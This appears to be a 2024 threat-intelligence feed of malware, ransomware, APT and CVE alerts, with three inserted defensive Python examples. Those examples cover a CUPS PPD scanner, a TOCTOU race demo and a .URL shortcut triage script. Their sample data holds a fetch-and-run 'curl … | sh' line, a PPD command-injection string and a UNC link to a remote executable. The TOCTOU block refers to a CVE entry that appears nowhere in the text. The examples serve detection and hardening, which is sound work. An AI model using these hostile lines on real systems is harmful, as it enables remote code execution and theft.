27.10.24 | Lynx ransomware - a formidable cyber-extortion threat | ALERTS | RANSOM | New research published by Palo Alto Networks Unit 42 indicates that the ransomware variant known as Lynx shares a significant portion of its source code with the INC ransomware. The operators of Lynx have actively targeted organizations in various sectors (architecture, real estate, retail, and financial/environmental services) in the U.S. and UK. The ransomware operates under a RaaS model and is disseminated through a variety of attack vectors (deceptive phishing mails, malicious downloads that infect user systems, hacking forums, etc.). Once a victim is compromised, data is exfiltrated before encryption, following the double-extortion approach to obtain a ransom payment. |
27.10.24 | CVE-2024-43572 - Microsoft Windows Management Console RCE vulnerability | ALERTS | VULNEREBILITY | CVE-2024-43572 is a Microsoft Windows Management Console remote code execution (RCE) vulnerability recently disclosed and patched as part of the October 2024 Patch Tuesday. The vulnerability is exploited through execution of specially crafted malicious Microsoft Saved Console (MSC) files. |
27.10.24 | Perfctl malware campaign exploiting RocketMQ vulnerability hits Linux Servers worldwide | ALERTS | VULNEREBILITY | A Perfctl malware campaign targeting millions of Linux servers worldwide has been observed. The campaign exploits the CVE-2023-33246 RocketMQ vulnerability. The malware employs rootkits for stealth and process masquerading along with TOR for command and control (C2) communication. As the final payload, it deploys a cryptominer alongside proxy hijacking software. Additionally, the malware utilizes temporary directories and modified system utilities to evade detection. |
27.10.24 | Kransom ransomware targets gamers by imitating Honkai: Star Rail installer | ALERTS | RANSOM | Reports indicate that Honkai: Star Rail, a popular role-playing game, is being impersonated by a new ransomware dubbed Kransom. The ransomware spreads through drive-by-download campaigns, enticing victims by masquerading the malicious binary as a legitimate Star Rail game installer and employing valid digital certificates. Upon execution, the malicious DLL is loaded using a dynamic-link library (DLL) side-loading technique, initiating the ransomware's encryption process. |
27.10.24 | Havoc Framework | ALERTS | VIRUS | Researchers have found that cybercriminals are increasingly leveraging pen-testing tools such as the Havoc framework to evade security systems. Havoc is less widely recognized than tools like Cobalt Strike or Metasploit, which makes it harder to spot. The Mysterious Werewolf group has been observed using it with strategies similar to those seen with the Mythic framework, and phishing emails that mimic legitimate organizations remain a common tactic for gaining unauthorized access. |
27.10.24 | CleanUpLoader Leveraged By Rhysida | ALERTS | VIRUS | A recent report shed light on a loader/backdoor known as "CleanUpLoader," used by the double-extortion ransomware actor "Rhysida" as an initial vector of infection. It is typically disguised as software installers like Microsoft Teams or Google Chrome. The loader facilitates communication with multiple command-and-control (C2) servers, allowing Rhysida to establish persistence and perform data exfiltration. |
27.10.24 | New Ivanti CSA vulnerabilities exploited in the wild | ALERTS | VULNEREBILITY | Ivanti has published a new security advisory covering three recently disclosed Ivanti CSA (Cloud Services Application) vulnerabilities that have been exploited in the wild. |
27.10.24 | Lua-based malware variants target the educational sector | ALERTS | VIRUS | There has been a recent surge in Lua-based malware targeting students, specifically attacks that capitalize on games popular within the student gamer community and on players searching for gaming cheats. Threat actors leverage fake game cheats to trick users into downloading the malware. |
27.10.24 | Horus Protector | ALERTS | VIRUS | A new malware distribution service has been uncovered called Horus Protector that claims to be a Fully Undetectable (FUD) crypter and distributes various malware families, including AgentTesla, Remcos, Snake, and NjRat. The service distributes malware using a .zip file that contains a VBE script and gathers information from users' machines to transmit to its server. |
27.10.24 | Threat actors associated with North Korea target tech job seekers with malware | ALERTS | APT | The Contagious Interview campaign started in 2023 and is perpetrated by threat actors associated with North Korea. Recent activity tied to this campaign has been observed in which the threat actors pose as job recruiters and lure victims into supposed interviews. |
27.10.24 | A Recent PhantomLoader Campaign | ALERTS | VIRUS | PhantomLoader is a malware that disguises itself as a legitimate 32-bit DLL for a certain antivirus software and was recently found posing as “PatchUp.exe,” a genuine component of the software. The malicious loader was observed using binary patching and self-modifying techniques to load rust-based malware dubbed SSLoad into memory. |
27.10.24 | Malvertising campaign leads to malicious Windows and Mac payloads | ALERTS | VIRUS | A recently published report identified a campaign whereby advertisers are pushing ads for utility software, such as Slack or Notion, which lead to downloads of malicious payloads. The advertisers registered under existing businesses and distributed ads that target both Windows and Mac users. |
27.10.24 | Yunit Stealer - an infostealing malware with geofencing capabilities | ALERTS | VIRUS | Yunit Stealer is a malware variant recently distributed in the wild. Yunit has extensive infostealing capabilities including theft and exfiltration of credentials, credit card data, cryptocurrency wallets, cookies, auto-fill data and others. The collected information is exfiltrated via Discord or Telegram webhooks back to the attackers. |
27.10.24 | Vilsa Stealer | ALERTS | VIRUS | Vilsa Stealer is a new infostealer malware variant identified in the wild. The malware has the functionality to exfiltrate miscellaneous confidential data from the infected machine including: browser data, credentials, autofill data, cookies, banking information, cryptocurrency wallets, Discord tokens and Telegram data, among others. |
27.10.24 | Falcon Keylogger | ALERTS | VIRUS | Falcon is a keylogger variant recently active in the wild. Older samples of this malware date back to 2019, while the latest observed are from just last month. Falcon can record keystrokes on the infected machine, collect system information, take screenshots, etc. The collected data is subsequently exfiltrated to C2 servers controlled by the attackers. |
27.10.24 | Nunu Stealer malware | ALERTS | VIRUS | Nunu Stealer is a recently discovered Python-based infostealing malware variant based on the older Akira Stealer strain. Its functionality includes exfiltration of various confidential information such as banking details, credit card data, credentials, autofill data stored in browsers, cookies, third-party application session data, Discord tokens, cryptocurrency wallets and more. Attackers can potentially use Nunu to compromise various user accounts and leverage those for further intrusions. |
27.10.24 | VeilShell: A new threat from North Korea's Vedalia APT group | ALERTS | APT | According to reports, threat actors linked to North Korea have been deploying a previously undocumented backdoor and remote access trojan (RAT) called VeilShell in a campaign targeting Southeast Asian countries. This activity is attributed to the Vedalia APT group (aka APT37, ScarCruft, Reaper). |
27.10.24 | SmartLoader Delivering Lumma Stealer | ALERTS | VIRUS | SmartLoader has been traced back to July 2024, involving a private GitHub account called "user-attachments." It starts with a zip archive containing four files: compiler.exe, conf.txt, Launcher.bat, and lua51.dll. The user runs Launcher.bat, which executes compiler.exe with conf.txt, triggering SmartLoader and deploying Lumma Stealer. |
27.10.24 | Key Group: Targeting Russian users with evolving ransomware | ALERTS | RANSOM | The Key Group is a financially motivated ransomware group that primarily targets Russian users and is known for negotiating with victims via Telegram. Like other groups that leverage leaked ransomware builders, Key Group predominantly utilizes the Chaos ransomware builder, among others, and operates a GitHub repository for its command and control (C2) infrastructure. |
27.10.24 | BabyLockerKZ - MedusaLocker Ransomware variant | ALERTS | RANSOM | BabyLockerKZ ransomware is a variant of MedusaLocker which has been active since 2023. This variant uses many of the same TTPs as seen in previous MedusaLocker attacks (publicly available tools, custom tools, lolbins, chat and leak sites). |
27.10.24 | Silver Oryx Blade - a new banking malware targeting Brazil | ALERTS | VIRUS | Silver Oryx Blade is a new banking trojan discovered by the researchers from Scitum. The malware prevalently targets victims from Brazil and attempts to steal banking information from the compromised machines. The infection chain is initiated via phishing emails leveraging financial or tax related lures. |
27.10.24 | Gorilla Botnet: A new global threat based on Mirai code | ALERTS | BOTNET | Reports indicate a surge in activity from a new botnet family called Gorilla Botnet, which is targeting telecommunications, universities, and the gaming industry worldwide. This botnet is a modified version of the Mirai source code and is compatible with various CPU architectures, including ARM, MIPS, x86_64, and x86. It boasts advanced DDoS attack methods and employs multiple techniques for persistence. |
27.10.24 | CeranaKeeper APT Campaign | ALERTS | APT | A recent CeranaKeeper APT campaign was observed by researchers. This China-linked threat actor targets government entities in Thailand, Myanmar, the Philippines, Japan, and Taiwan. The group continuously updates its tools, such as backdoors, to evade detection and exploits cloud services like Dropbox and OneDrive for custom solutions. |
27.10.24 | Fake Update Campaign Delivering WarmCookie Malware | ALERTS | CAMPAIGN | A new campaign in France is using compromised websites to distribute the WarmCookie backdoor through fake update prompts for popular applications like Google Chrome and Java. This tactic, employed by the threat group 'SocGholish', tricks users into downloading malicious software masquerading as legitimate updates for browsers and applications like Java and VMware. |
27.10.24 | Defi Ransomware | ALERTS | RANSOM | Defi is the newest malware variant from the Makop ransomware family. The malware encrypts user files and appends .defi1328 to them, along with the operators' email address and the victim's unique ID. The ransom note is dropped in the form of a text file called "README-WARNING.txt" in various folders on the disk. |
27.10.24 | Stonefly threat group continues to launch extortion attacks against US targets | ALERTS | GROUP | Symantec’s Threat Hunter Team has found evidence that the North Korean Stonefly group (aka Andariel, APT45, Silent Chollima, Onyx Sleet) is continuing to mount financially motivated attacks against organizations in the U.S., despite being the subject of an indictment and a multi-million dollar reward. |
27.10.24 | K4Spreader and Hadooken Latest Attacks | ALERTS | VULNEREBILITY | Recent research identified an infection chain targeting Windows and Linux systems through Oracle WebLogic vulnerabilities (CVE-2017-10271 and CVE-2020-14883). The attacker used Python and Bash scripts to deploy K4Spreader malware, which delivered the Tsunami backdoor and a cryptominer. |
27.10.24 | New Rast ransomware threat targets Chinese government entities | ALERTS | RANSOM | A new ransomware threat called Rast has been identified, specifically targeting Chinese government entities. The attack vector includes RDP brute-forcing and exploiting N-day vulnerabilities to gain access to border servers, followed by the manual deployment of ransomware components. |
27.10.24 | Active malware campaign targeting Russian energy companies and Electronics suppliers | ALERTS | CAMPAIGN | A new malware campaign targeting Russian energy companies and electronic component suppliers has been observed. The malware spreads through email attachments or Yandex Disk links, using RAR archives that contain LNK files to download and execute malicious HTA files. These files generate VBS scripts that ensure persistence via registry keys and scheduled tasks. |
27.10.24 | CVE-2024-43461 - Windows MSHTML Platform Spoofing vulnerability exploited in the wild | ALERTS | VULNEREBILITY | CVE-2024-43461 is a Windows MSHTML spoofing vulnerability recently disclosed as part of the September 2024 Patch Tuesday. Successful exploitation of this flaw might allow attackers to execute arbitrary code within the context of the application. The flaw has been reported as exploited in zero-day attacks in conjunction with another MSHTML vulnerability from July, CVE-2024-38112. |
27.10.24 | North Korean hackers target Cryptocurrency users on LinkedIn with RustDoor malware | ALERTS | CRYPTOCURRENCY | In early September, the FBI warned of North Korean threat actors targeting the crypto industry. A campaign has been reported where these actors attempt to lure potential victims on LinkedIn to deliver RustDoor malware. One user was approached by someone impersonating a recruiter for a legitimate decentralized cryptocurrency exchange (DEX) technology firm, supported by professional-looking websites to enhance the legitimacy of the fake entities. |
27.10.24 | CVE-2024-6670 - Progress WhatsUp Gold SQL Injection vulnerability | ALERTS | VULNEREBILITY | CVE-2024-6670 is a recently disclosed SQL Injection vulnerability affecting Progress WhatsUp Gold, which is a well known network monitoring software. Successful exploitation of this flaw could allow an unauthenticated attacker to retrieve the user's encrypted passwords. The vulnerability has also been added to the "Known Exploited Vulnerabilities Catalog" by CISA, following reports of active exploitation in conjunction with another WhatsUp Gold vulnerability CVE-2024-6671. |
27.10.24 | Vulnerabilities in the Common UNIX Printing System (CUPS) | ALERTS | VULNEREBILITY | Symantec is aware of multiple vulnerabilities in the Common UNIX Printing System (CUPS) on UNIX-based systems, where an attacker could exploit certain configurations to gain unauthorized access and perform remote code execution (RCE), particularly by leveraging the cups-browsed service. |
27.10.24 | Advanced Rhadamanthys Infostealer: AI-Driven threats to Cryptocurrency security | ALERTS | VIRUS | A new version of Rhadamanthys Infostealer with advanced features including the use of artificial intelligence (AI) for optical character recognition (OCR) has been reported. |
27.10.24 | DCRat (aka Dark Crystal RAT) Trojan Malware | ALERTS | VIRUS | DCRat (aka Dark Crystal RAT) is a modular remote access Trojan available as malware-as-a-service since 2018. It can execute commands, log keystrokes, and exfiltrate data. Recently, it was delivered using HTML smuggling, which embeds and obfuscates the payload within HTML to evade security measures. |
28.9.24 | Wallet Scam: A Case Study in Crypto Drainer Tactics | HACKING | CRYPTOCURRENCY | Check Point Research (CPR) uncovered a malicious app on Google Play designed to steal cryptocurrency marking the first time a drainer has targeted mobile device users exclusively. The app used a set of evasion techniques to avoid detection and remained available for nearly five months before being removed. |
28.9.24 | CVE-2024-8190 - Ivanti Cloud Service Appliance Command Injection vulnerability | ALERTS | VULNEREBILITY | CVE-2024-8190 is a high-severity (CVSS score 7.2) OS Command Injection vulnerability affecting Ivanti Cloud Services Appliance (CSA) versions 4.6 Patch 518 and older. If successfully exploited, the flaw might allow a remote authenticated attacker to achieve arbitrary code execution. |
28.9.24 | Vidar malware spreads via PEC Mail and Telegram profiles | ALERTS | VIRUS | CERT-AGID has identified a new campaign distributing Vidar through PEC mailboxes. The attackers are still leveraging Steam community profiles, but a significant new tactic involves exploiting Telegram profiles. In particular, the bios of these profiles are being used to reveal the IP addresses of their command and control (C2) servers. |
28.9.24 | Louse APT Group launches malware campaign targeting Chinese entities | ALERTS | APT | The Louse APT group (also known as Patchwork and Dropping Elephant) has reportedly launched a malware campaign targeting Chinese entities. The attack vector involves a malicious LNK file, likely originating from a phishing email. This file executes a PowerShell script that downloads a decoy PDF and a malicious DLL, which is loaded using DLL sideloading techniques. |
28.9.24 | CVE-2024-46908 | VULNEREBILITY | CVE | Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) working with Trend Micro Zero Day Initiative |
28.9.24 | CVE-2024-46907 | VULNEREBILITY | CVE | Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) working with Trend Micro Zero Day Initiative |
28.9.24 | CVE-2024-46906 | VULNEREBILITY | CVE | Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) working with Trend Micro Zero Day Initiative |
28.9.24 | CVE-2024-46905 | VULNEREBILITY | CVE | Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) working with Trend Micro Zero Day Initiative |
28.9.24 | CVE-2024-46909 | VULNEREBILITY | CVE | Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) working with Trend Micro Zero Day Initiative |
28.9.24 | CVE-2024-8785 | VULNEREBILITY | CVE | Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) working with Trend Micro Zero Day Initiative |
27.9.24 | Embargo | GROUP | RANSOMWARE | Embargo Ransomware Group Strikes DME Delivers in Cyber Attack |
27.9.24 | CVE-2024-47176 | VULNEREBILITY | CVE | cups-browsed <= 2.0.1 binds on UDP INADDR_ANY:631 trusting any packet from any source to trigger a Get-Printer-Attributes IPP request to an attacker-controlled URL |
27.9.24 | CVE-2024-47076 | VULNEREBILITY | CVE | libcupsfilters <= 2.1b1 cfGetPrinterAttributes5 does not validate or sanitize the IPP attributes returned from an IPP server, providing attacker-controlled data to the rest of the CUPS system |
27.9.24 | CVE-2024-47175 | VULNEREBILITY | CVE | libppd <= 2.1b1 ppdCreatePPDFromIPP2 does not validate or sanitize the IPP attributes when writing them to a temporary PPD file, allowing the injection of attacker-controlled data in the resulting PPD |
27.9.24 | CVE-2024-47177 | VULNEREBILITY | CVE | cups-filters <= 2.0.1 foomatic-rip allows arbitrary command execution via the FoomaticRIPCommandLine PPD parameter |
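The four CUPS entries above describe one chain: cups-browsed accepts an unsolicited UDP packet, fetches attributes from an attacker-controlled IPP server, writes them unsanitized into a generated PPD, and foomatic-rip later executes whatever ends up in the `*FoomaticRIPCommandLine` parameter. The following Python triage script is an added example, not code from the CUPS project or the original advisory. It pulls every `*FoomaticRIPCommandLine` value out of a PPD and flags shell metacharacters or an unexpected first word, and it shows the producer-side check a PPD generator should apply to IPP attribute text before writing it. The PPD fragment, the 198.51.100.7 address and the allow-list of rip binaries are constructed for the example; real PPDs can continue a value across lines with `*End`, which this single-line parser does not handle.

```python
"""Triage a CUPS PPD for a dangerous *FoomaticRIPCommandLine and show a
hardened IPP-attribute check. Added example; all sample data is constructed."""
import re

# Constructed PPD fragment: one benign command line, then one that an
# unsanitized IPP attribute could have injected as an extra keyword line.
SAMPLE_PPD = r'''*PPD-Adobe: "4.3"
*FormatVersion: "4.3"
*ModelName: "Example Printer"
*cupsFilter2: "application/vnd.cups-pdf application/vnd.cups-postscript 0 foomatic-rip"
*FoomaticRIPCommandLine: "gs -q -dBATCH -dNOPAUSE -sDEVICE=pxlmono -sOutputFile=- -"
*FoomaticRIPCommandLine: "gs -q -dBATCH -sOutputFile=- - ; curl http://198.51.100.7/x | sh"
*OpenUI *PageSize: PickOne
*CloseUI: *PageSize
'''

KEY_RE = re.compile(r'^\*FoomaticRIPCommandLine:\s*"(.*)"\s*$', re.M)
# Shell metacharacters that have no business in a rip command string.
META_RE = re.compile(r'[;&|`$<>\n]')
# Assumption for the example: binaries a local rip command may start with.
ALLOWED_FIRST_WORDS = {"gs", "foomatic-rip", "pdftops", "gstoraster"}


def ppd_command_lines(ppd_text):
    """Return every *FoomaticRIPCommandLine value, in order of appearance."""
    return KEY_RE.findall(ppd_text)


def is_suspicious(cmd):
    """True if the command line carries shell metacharacters or an unknown binary."""
    words = cmd.split()
    first = words[0] if words else ""
    return bool(META_RE.search(cmd)) or first not in ALLOWED_FIRST_WORDS


def scan_ppd(ppd_text):
    """Return (all_command_lines, suspicious_command_lines)."""
    cmds = ppd_command_lines(ppd_text)
    return cmds, [c for c in cmds if is_suspicious(c)]


def sanitize_ipp_attribute(value, max_len=255):
    """Producer-side check: text copied from an IPP response into a PPD must
    not be able to close the quoted value or start a new *Keyword line."""
    if len(value) > max_len:
        raise ValueError("attribute too long")
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in value):
        raise ValueError("control characters not allowed")
    if '"' in value or value.lstrip().startswith("*"):
        raise ValueError("quote or keyword marker not allowed")
    return value


if __name__ == "__main__":
    cmds, bad = scan_ppd(SAMPLE_PPD)
    for c in cmds:
        print(("SUSPICIOUS " if c in bad else "ok         ") + c)
    for attr in ["Example Printer", 'Foo"\n*FoomaticRIPCommandLine: "id']:
        try:
            print("accepted:", sanitize_ipp_attribute(attr))
        except ValueError as err:
            print("rejected:", repr(attr), "->", err)
```

On a host you administer, the complementary operational checks are `ss -lun | grep ':631'` (is cups-browsed bound on UDP 631 at all?) and, where printer browsing is not needed, `systemctl disable --now cups-browsed`; the generated PPDs under `/etc/cups/ppd/` are what the scanner above should be pointed at.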
27.9.24 | DragonForce | GROUP | RANSOMWARE | Inside the Dragon: DragonForce Ransomware Group |
27.9.24 | DCRat | MALWARE | RAT | DCRat Targets Users with HTML Smuggling |
27.9.24 | CVE-2024-0132 | VULNEREBILITY | CVE | NVIDIA Container Toolkit 1.16.1 or earlier contains a Time-of-check Time-of-Use (TOCTOU) vulnerability when used with default configuration where a specifically crafted container image may gain access to the host file system. |
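Both CVE-2024-30088 (Windows kernel, above) and CVE-2024-0132 (NVIDIA Container Toolkit) are described as Time-of-Check Time-of-Use races: a resource is validated by name, then used by name, and an attacker who changes what the name refers to in between wins. The Python snippet below is an added example, not code from either vendor, that shows the generic shape of the bug and the generic fix on a file path: the vulnerable reader checks `os.path.isfile()` and then calls `open()` on the same path, while the hardened reader opens once with `O_NOFOLLOW` and validates the descriptor it actually holds with `fstat()`. The `race` hook stands in for the attacker and swaps the file for a symlink inside the window; the directory, file names and contents are constructed by `demo()`. It assumes a POSIX system (`O_NOFOLLOW`, symlinks).

```python
"""Check-then-use on a path (TOCTOU) versus validate-what-you-opened.
Added example; POSIX-only; the scenario in demo() is constructed."""
import os
import shutil
import stat
import tempfile


def read_if_regular_vulnerable(path, race=None):
    """Vulnerable: the check and the use each resolve the path separately.
    Anything that happens between them (here: race()) changes what open() sees."""
    if not os.path.isfile(path) or os.path.islink(path):
        raise PermissionError("not a regular file")
    if race:
        race()                      # attacker wins the window
    with open(path, "rb") as f:     # follows whatever the path means *now*
        return f.read()


def read_if_regular_hardened(path, race=None):
    """Hardened: open exactly once, refuse a symlink at the final component,
    then validate the object behind the descriptor we hold, not the name."""
    if race:
        race()                      # attacker acts first; there is no window after open()
    flags = os.O_RDONLY | os.O_NOFOLLOW | getattr(os, "O_CLOEXEC", 0)
    try:
        fd = os.open(path, flags)
    except OSError as err:          # ELOOP when the path is a symlink
        raise PermissionError(f"refusing to follow symlink: {path}") from err
    try:
        st = os.fstat(fd)           # describes the opened object, not the path
        if not stat.S_ISREG(st.st_mode):
            raise PermissionError("not a regular file")
    except Exception:
        os.close(fd)
        raise
    with os.fdopen(fd, "rb") as f:  # fdopen takes ownership of fd
        return f.read()


def demo():
    """Constructed scenario: a public report is swapped for a symlink to a
    secret key in the check-to-use window. Returns what each reader produced."""
    workdir = tempfile.mkdtemp()
    secret = os.path.join(workdir, "secret.key")
    public = os.path.join(workdir, "report.txt")
    with open(secret, "wb") as f:
        f.write(b"TOP-SECRET")

    def reset():
        if os.path.lexists(public):
            os.remove(public)
        with open(public, "wb") as f:
            f.write(b"public report")

    def swap():                     # the racing attacker
        os.remove(public)
        os.symlink(secret, public)

    out = {}
    reset()
    out["vulnerable"] = read_if_regular_vulnerable(public, race=swap)
    reset()
    try:
        out["hardened"] = read_if_regular_hardened(public, race=swap)
    except PermissionError as err:
        out["hardened"] = "refused: " + str(err)
    reset()
    out["hardened_no_race"] = read_if_regular_hardened(public)
    shutil.rmtree(workdir)
    return out


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:17s} -> {result!r}")
```

The general rule the example illustrates: a security decision must be made on the same handle that is later used (descriptor, object reference, mapped page), never on a name that can be re-bound between the two steps.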
27.9.24 | Hacking Kia | HACKING | CAR | Hacking Kia: Remotely Controlling Cars With Just a License Plate |
27.9.24 | FPSpy | MALWARE | BACKDOOR | Unraveling Sparkling Pisces’s Tool Set: KLogEXE and FPSpy |
27.9.24 | KLogEXE | MALWARE | KEYLOGGER | Unraveling Sparkling Pisces’s Tool Set: KLogEXE and FPSpy |
27.9.24 | SilentSelfie | CAMPAIGN | CAMPAIGN | SilentSelfie: Uncovering a major watering hole campaign against Kurdish websites |
27.9.24 | Malspam campaign targeting transportation industry | ALERTS | CAMPAIGN | Researchers have recently disclosed a malspam campaign targeting organizations in the transportation industry. The attack originates from compromised mail accounts and uses files with a .URL extension that are either attached to or linked from the spam messages. If such a URL file is opened, the victim's machine initiates an outbound SMB connection to download and run a remote malicious executable. |
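A Windows Internet Shortcut (.URL) is a small INI file whose `URL=` value Windows will happily resolve to a `file://\\host\share\...` UNC path, which is what makes the outbound SMB fetch described above possible; an `IconFile=` that points at a UNC path is fetched over SMB as well, just to render the icon. The script below is an added example, not tooling from the report, that triages .URL files for remote UNC targets and calls out ones whose target is an executable. The three sample shortcuts, the 203.0.113.5 address and the extension list are constructed for the example; a mail gateway or EDR job would feed it real attachments instead.

```python
"""Triage Windows Internet Shortcut (.URL) files for remote UNC targets.
Added example; the sample shortcuts are constructed inline."""
import configparser
import os
import re

# Constructed samples: one malicious, one benign HTTPS link, one local file link.
SAMPLES = {
    "invoice.url": (
        "[InternetShortcut]\r\n"
        "URL=file://\\\\203.0.113.5\\share\\invoice_2024.exe\r\n"
        "IconFile=\\\\203.0.113.5\\share\\pdf.ico\r\n"
        "IconIndex=1\r\n"
    ),
    "vendor.url": "[InternetShortcut]\r\nURL=https://www.example.com/portal\r\n",
    "local.url": "[InternetShortcut]\r\nURL=file:///C:/Users/Public/readme.txt\r\n",
}

# Matches \\host\path, //host/path and file://\\host\path (any slash flavour).
UNC_RE = re.compile(r'^(?:file:)?[\\/]{2,}([^\\/]+)[\\/]+(.*)$', re.I)
# Assumption for the example: extensions that execute when launched from a share.
EXEC_EXT = {".exe", ".dll", ".scr", ".js", ".vbs", ".hta", ".lnk", ".bat", ".cmd", ".msi"}
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}


def unc_target(value):
    """Return (host, path) when value names a UNC location, else None."""
    m = UNC_RE.match(value.strip())
    return (m.group(1), m.group(2)) if m else None


def is_local(host):
    """file:///C:/... parses with 'C:' as the host; treat drive letters as local."""
    return host.lower() in LOCAL_HOSTS or re.fullmatch(r'[A-Za-z]:', host) is not None


def triage(name, content):
    """Return a list of (file, key, host, reason) findings for one .URL file."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(content)
    if not cp.has_section("InternetShortcut"):
        return []
    section = cp["InternetShortcut"]
    findings = []
    for key in ("url", "iconfile", "workingdirectory"):   # keys are lower-cased by configparser
        value = section.get(key)
        if not value:
            continue
        target = unc_target(value)
        if target is None or is_local(target[0]):
            continue
        host, path = target
        reason = f"{key} points to remote UNC host {host}"
        ext = os.path.splitext(path)[1].lower()
        if key == "url" and ext in EXEC_EXT:
            reason += f" and names an executable ({ext})"
        findings.append((name, key, host, reason))
    return findings


if __name__ == "__main__":
    for fname, text in SAMPLES.items():
        hits = triage(fname, text)
        print(fname, "->", "clean" if not hits else "")
        for hit in hits:
            print("   ", hit[3])
```

The remote `IconFile=` case is worth keeping in the output even when the `URL=` looks harmless: Windows Explorer resolves the icon as soon as the folder containing the shortcut is displayed, so the SMB connection (and the NTLM exchange that comes with it) can happen before anyone double-clicks anything.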
27.9.24 | SloppyLemming: Phishing campaigns targeting South and East Asia organizations | ALERTS | CAMPAIGN | Reports indicate that a threat actor known as SloppyLemming has been actively targeting organizations in South and East Asia, particularly in Pakistan and Bangladesh. This actor employs open-source adversary emulation frameworks such as Cobalt Strike and Havoc. |
27.9.24 | New DragonForce ransomware variant targets Global Industries with LockBit and Conti modifications | ALERTS | RANSOM | New variants of DragonForce ransomware, featuring modified versions of LockBit and Conti, have been observed targeting the manufacturing, real estate, and transportation industries worldwide. DragonForce operates a Ransomware-as-a-Service affiliate program, offering various attack management tools. The group employs the SystemBC backdoor for persistence, along with Mimikatz and Cobalt Strike for credential harvesting and lateral movement. |
27.9.24 | Twelve attack group aims to destroy | ALERTS | HACKING | Established in 2023 in response to the Russian-Ukrainian conflict, the attack group known as Twelve has been observed targeting Russian government organizations. The group's tactics include file encryption via ransomware, file/system deletion via wipers, and exfiltration of sensitive data among others. Based on the analysis provided in a recently published report, the goal of the group is focused on destruction rather than financial gain. |
27.9.24 | New KLogExe and FPSpy | ALERTS | VIRUS | The new keylogger KLogExe and a backdoor variant named FPSpy have been used by the Sparkling Pisces (aka Kimsuky, THALLIUM, Velvet Chollima) threat group. This APT group is known for sophisticated cyber-espionage operations and advanced spear-phishing attacks in which it lures victims into downloading and executing malicious payloads, including new and previously undocumented malware. |
26.9.24 | BlackJack | GROUP | Hacktivist | BlackJack is a hacktivist group that emerged at the end of 2023, targeting companies based in Russia. In their Telegram channel, the group states that it aims to find vulnerabilities in the networks of Russian organizations and government institutions. |
26.9.24 | SloppyLemming | CAMPAIGN | Crypto | Unraveling SloppyLemming’s Operations Across South Asia |
26.9.24 | Salt Typhoon | CAMPAIGN | ISP | China's 'Salt Typhoon' Cooks Up Cyberattacks on US ISPs |
25.9.24 | Taliban Stealer | MALWARE | Stealer | Cyfirma researchers have discovered a website promoting a tool called 'Taliban Stealer'. Once executed, this stealer prompts the user to select what data to collect from the machine, such as passwords, cookies, or cryptocurrency wallets. |
25.9.24 | Rage Stealer | MALWARE | Stealer | A Comprehensive Analysis of Angry Stealer : Rage Stealer in a New Disguise |
25.9.24 | X-FILES Stealer | MALWARE | Stealer | X-FILES Stealer: Advanced malware with sophisticated features and ongoing enhancements |
25.9.24 | QWERTY Stealer | MALWARE | Stealer | QWERTY is a newly discovered infostealer variant observed being hosted on a Linux-based virtual private server located in Germany with limited service exposure. |
25.9.24 | Yet Another Silly Stealer (YASS) | MALWARE | Stealer | There's Something About CryptBot: Yet Another Silly Stealer (YASS) |
25.9.24 | POWERSHELL KEYLOGGER | MALWARE | Keylogger | CYFIRMA published an analysis of a newly identified keylogger that operates via a PowerShell script. |
25.9.24 | Poseidon | MALWARE | Stealer | Poseidon Stealer Uses Sora AI Lure to Infect macOS |
25.9.24 | Luxy | MALWARE | Stealer | Luxy: A Stealer and a Ransomware in one |
25.9.24 | Gomorrah | MALWARE | Stealer | Gomorrah Stealer v5.1: An In-Depth Analysis of a .NET-Based Malware |
25.9.24 | Emansrepo | MALWARE | Stealer | In August 2024, FortiGuard Labs observed a python infostealer we call Emansrepo that is distributed via emails that include fake purchase orders and invoices. |
25.9.24 | BLX (aka XLABB) | MALWARE | Stealer | BLX Stealer, also known as XLABB Stealer, is a malware variant first observed last year. New activity attributed to this infostealer has been observed in the wild. |
25.9.24 | RomCom RAT | MALWARE | RAT | Security Brief: Actor Uses Compromised Accounts, Customized Social Engineering to Target Transport and Logistics Firms with Malware |
25.9.24 | | HACKING | HTML | The messages contained URLs which directed users through various dialogue boxes leading them to copy, paste, and run a Base64-encoded PowerShell script contained within the HTML, a technique called "ClickFix." The scripts led to an MSI file used to load DanaBot. |
25.9.24 | Foxtrot Ransomware - a new MedusaLocker variant | ALERTS | RANSOM | Foxtrot is the latest ransomware variant from the MedusaLocker family. The malware encrypts user files and appends .foxtrot70 to them. The ransom note is dropped in the form of a .html file called "How_to_back_files.html". Foxtrot comes with functionality to delete the volume shadow copies and Windows Backup on the infected machines. |
25.9.24 | PDiddySploit Trojan Malware | ALERTS | VIRUS | A recent research study has revealed that the scandal surrounding Sean 'Diddy' Combs, also known as P. Diddy, has been exploited. Attackers often capitalize on public interest in high-profile scandals to spread malware, taking advantage of the topic to trick unsuspecting users into downloading malicious files. |
25.9.24 | Turkey and Bulgaria Targeted in Remcos RAT Attacks | ALERTS | VIRUS | Symantec has recently observed two ongoing Remcos RAT campaigns from the same actor, targeting companies in Bulgaria and Turkey. In the Bulgarian campaign, they are using a classic invoice scheme (email subject: Плащане на фактура) to lure users, while in the Turkish campaign, they are using SWIFT transfer social engineering (email subject: Gelen Swift Mesaj). |
25.9.24 | Nanocore RAT Spreads Through Fake XLS Invoice | ALERTS | VIRUS | Nanocore RAT was highly prevalent many years ago and its use has since dwindled drastically, but some groups and individuals continue to leverage this remote access trojan in their campaigns. One recent example is a fake invoice malspam campaign in which the authors attached a malicious XLS (invoice.xls) that, when executed, grabs the Nanocore binary from a Discord server. |
25.9.24 | SnipBot - a new variant of the RomCom malware | ALERTS | VIRUS | Researchers from Palo Alto reported on a new variant of the RomCom malware dubbed SnipBot. The malware allows the attackers to execute command-line commands on the infected endpoints as well as to download additional arbitrary modules. |
25.9.24 | New Octo2 mobile malware variant observed in the wild | ALERTS | VIRUS | New variant of the Octo Android malware dubbed Octo2 has been identified in the wild. The malware has been spread via malicious campaigns targeting mobile users from European countries. |
